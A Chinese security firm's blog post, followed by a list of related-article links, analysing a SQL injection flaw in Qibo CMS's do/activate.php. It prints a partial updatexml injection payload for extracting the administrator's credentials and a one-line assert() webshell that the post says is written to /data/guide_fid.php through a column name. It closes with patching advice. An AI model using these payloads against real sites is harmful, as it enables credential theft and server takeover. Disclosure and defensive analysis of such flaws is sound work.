齐博cms最新SQL注入网站漏洞 可远程执行代码提权
齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用。
在对整个网站代码的漏洞检测中发现do目录下的activate.php存在可以插入恶意参数的变量值,我们来看下这个代码:
齐博cms漏洞详情:
从代码里发现这个代码的功能是发送序列号激活的一个功能,从激活的链接地址里,可以看出do/activate.php?job=activate&safe_id=$safe_id 是用来激活序列号的,我们从整个齐博的代码里找到了账号激活的一个大体的过程,首先会注册一个账号,注册账号后会需要发送邮件到用户的邮箱里,邮箱里验证的是safe_id这个值,这个safe_id这个值经过md5的解密后直接生成uaername跟用户的密码,然后再传入到get_safe()这个函数,在这个inc文件夹下的class.user.php代码里找得到这个函数。
我们发现这个get_safe()函数是用来传递用户的激活信息,并进行安全过滤与判断的,从这里我们可以插入恶意的sql语句到网站后端里去,并直接到数据库中执行该语句,我们本地来测试一下是否可以sql注入:
从上图我们可以看出可以进行网站sql注入攻击,那么我们就可以进行查询数据库的账号密码操作,比如查询网站超级管理员的账号密码:and (updatexml(1,concat(0x7e,(substring((selectusername from qb_memberdata where groupid=3),1, 这个语句就是查询超级管理员的账号密码,通过这里我们查到网站的管理员账号密码,登录后台,我们进行远程代码提权了。
增加栏目为${assert($_POST[safe])},一句话后门的代码会直接写入到/data/guide_fid.php文件,用一句话木马连接工具连接即可。
关于齐博cms漏洞的修复,我们SINE安全建议网站的运用者,尽快升级齐博CMS到最新版本,对于sql注入语句进行安全过滤与sql注入防护,对网站的后台默认地址进行详细的更改为其他的文件名。对于前端网站进行sql语句查询的时候进行网站安全白名单系统部署,网站后台的账号密码设置的复杂一些,尽可能的用数字+大小写+特殊字符组合。
齐博cms最新SQL注入网站漏洞 可远程执行代码提权相关推荐
- wordpress漏洞_WordPress XSS漏洞可能导致远程执行代码(RCE)
原作者: Ziyahan Albeniz 在2019年3月13日,专注于静态代码分析软件的RIPS科技公司发布了他们在所有版本的WordPress 5.1.1中发现的跨站点脚本(XSS)漏洞的详细信息 ...
- CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现 一.漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HT ...
- 齐博cms老漏洞分析
这天看一些经典的审计的例子,看到齐博cms的2013年的一个老洞,这个漏洞我感觉很经典,这里总结一下,记个笔记 这个漏洞是变量覆盖的漏洞 首先出问题的地方是fujsarticle.php,下面是是整个 ...
- 齐博cms 7.0 漏洞分析
** 0x01 原理分析 ** 还是很早之前爆出来的漏洞,现在拿出来学习一下,参考阿里巴巴: https://security.alibaba.com/... 漏洞发生在/inc/common.inc ...
- 齐博cms任意登陆漏洞
为什么80%的码农都做不了架构师?>>> 收集下,以后估计有用得到的时候 齐博cms整站系统(原PHP168)配置不当导致任意用户登陆,比如cms管理员等. 详细说明: 还是由 ...
- 网站漏洞修复方案防止SQL注入攻击漏洞
SQL注入漏洞在网站漏洞里面属于高危漏洞,排列在前三,受影响范围较广,像asp..net.PHP.java.等程序语言编写的代码,都存在着sql注入漏洞,那么如何检测网站存在sql注入漏洞? SQL注 ...
- 74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
文章目录 74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389) 1.74CMS(骑士CMS)简介 2.漏洞描述 3.影响版本 4.fofa查询语句 5.漏洞复现 6.POC& ...
- 怎样检查网站Sql注入的漏洞
怎样检查网站Sql注入的漏洞 https://jingyan.baidu.com/article/bad08e1effbdca09c85121ba.html 转载于:https://www.cnblo ...
- php代码审计【23】齐博CMS通杀漏洞漏洞
一.安装好齐博CMS_V7,安装完成后如下: 二.分析代码 common.inc.php foreach($_COOKIE AS $_key=>$_value){unset($$_key); } ...
最新文章
- 埃隆·马斯克:比特币拥有着“极为出色”的结构,而纸质货币终将消失
- Office SharePoint Server 2007 (Beta2) 管理、部署文档
- 使用UML描述需求都实现的过程
- 【i.MX6UL/i.MX6ULL开发常见问题】单独编译内核,uboot生成很多文件,具体用哪一个?...
- 低功耗蓝牙onscanresult 出来名字为空_浅析BLE5.0蓝牙模块在智能家居的运用
- IDEA的debug方法头坑
- ZooKeeper学习笔记—配置管理
- python怎样切换到上一行_如何返回到python中的前一行?
- 洛谷 P3951 小凯的疑惑
- WindowsXP自带小工具(转)
- 2021 知来者之可追
- Git生成生成公钥和私钥
- 设计模式——结构型模式
- “华数杯”建模学习思考(MatlabPython代码实现)
- 法国大数据分析服务初创公司 Dataiku 获1400 万美元 A 轮融资
- checkmarx 8
- 帝国cms 7.5 wap变量引用(头尾变量引用方法)
- 在macbook上安装windows几种方案
- 【微电子】半导体器件物理:0-3器件技术发展走势
- python 仿真 电力系统自动化_电力系统自动化技术的应用及发展方向
热门文章
- led可见光通信直方图均衡matlab,基于高通滤波和直方图均衡的钢轨裂纹红外图像增强技术...
- centos8安装搭建php环境
- Android异常之#8002 java.lang.IllegalArgumentException
- axure常用函数判断
- 2022-1-16 牛客C++项目 —— Linux多进程编程 —— waitpid函数
- .isAssignableFrom的用法
- 论文笔记 | 标准误聚类问题
- android中开启wifi,打开android系统设置,连接wifi
- 哪些成员函数不能被继承
- CPU state小结